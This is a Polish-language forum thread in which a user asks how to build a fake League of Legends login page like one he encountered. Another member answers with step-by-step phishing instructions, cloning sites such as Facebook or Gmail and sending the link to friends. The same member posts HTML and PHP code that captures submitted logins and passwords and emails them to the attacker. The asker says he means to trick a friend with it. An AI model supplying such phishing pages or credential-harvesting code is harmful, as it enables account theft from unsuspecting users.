Keylogger?

[arturbemolxD]

Witajcie, ostatnio grze League of Legends ktoś wysłał mi link, że niby darmowe RP(darmowa waluty w tej grze) na stronie pojawił się ekran logowania tak jak normalna strona lola. I teraz mam pytanie, czy to był kaylogger? na jakiej zasadzie to działa? i czym dałbym rade zrobić takie coś sam? jak tak to w czym i ogólnie jak zrobić taką strone?

[OGWoziu]

Tak. Zapisuje wpisane passy. Nie dasz skoro o to pytasz. html+php

[arturbemolxD]

mógłbyś odesłać mnie do jakiegoś poradnika albo poradzić chociaż jak to zrobić ?;/ wydaje mi sie ze trzeba coś z kodem źródłowym. a i jeszcze to trzeba stworzyć nową stronę z hostingiem?

[OGWoziu]

Tamtej strony raczej nie użyjesz

 

@@Edit

jak obsługują php to tak

[arturbemolxD]

aha a w jakims darmowym hostingu da sie to zrobić? np. yoyo albo cba?

[Fennec]

Keylogger? Raczej atak phishingowy(wiki)...

 

Jak zrobić taką stronę? To proste:

1. Odwzorowujesz stronę, którą wykorzystasz do ataku(facebook, gmail, yahoo etc.), ale jak jesteś leniwy, to skopiuj elementy z oryginalnej strony(Inspect Element -> CTRL + A -> CTRL + R -wpisz-> notepad -> CTRL + C)
2. Przerób stronę, aby były oznaki phishingu(inteligentne osoby zauważą, a ty nie będziesz mógł w 100% powiedzieć, że to była kopia fejsuba - ale to do trony prawnej się pytaj), np. logo, kawałki kodu, pododawaj komentarze w HTML'u...
3. Kod php wstrzyknij do HTML'a i połącz z bazą dany etc.
4. Gotowe! Teraz tylko wysłać znajomym.

[arturbemolxD]

Aha i jeszcze jedno pytanie. mam wrażenie, że same wyświetlenia róznych tematów na tym forum są "zhackowane" tzn. w tej chwili czyta to niby 200 osób ? w tym sami goście ? cos mi tu nie pasi..

a co to hacka? mógłbys podać ten kod php żeby login i hasło wysyłał mi np. na email [email protected]?

[Fennec]

Może boty do ddos'u się przygotowują

Wiesz - nigdy nic nie wiadomo. To jest na temat. I czy to wyżej było pytanie?

 

//edit To bug

[arturbemolxD]

Pytałem czy mógłbys na  tutaj(albo pw) wysłać mi takiego gotowca?( i w ktorym miejscu wstawic ten kod? nie bardzo się na tym znam, robiłem kiedyś strone w html siostrze więc mniej wiecej kumam ale to juz jest bardziej zaanwanoswane

[Fennec]

 index.php

<!--Tutaj szkielet strony i inne bajery-->
<form action="sorry.php" method="POST">
<input placeholder="LOGIN" name="login"/>
<input placeholder="HASLO" name="passcode"/>
<button type="sumbit">Loguj</button>
</form>

sorry.php

<!--Tutaj szkielet strony z błędem(np. zła przeglądarka)-->
<?
$login = $_POST['login'];
$passcode = $_POST['passcode'];
$message = "O to hasła dla konta z loginem ".$login." Hasło: ".$passcode.";
mail('twó[email protected]', 'Hasła dla'.$login.' :)', $message);
?>

Powinno działać...

Ja mu tylko pomagam, nie działam nielegalnie!

PS. @arturbemolxD Wiesz, że umieszczenie tego w necie jest nielegalne?

[arturbemolxD]

jasne, nie mam zamiaru :P tylko kolegę chciałem nabrac

jakoś nie działa. Po wcisnięciu "LOgin" pojawia sie juz normalna oryginalna strona z linkiem pl.

edit/ napewno dobrze to napisałeś ? <? i ?> ? bo jakos nie chce wysylac nic na mail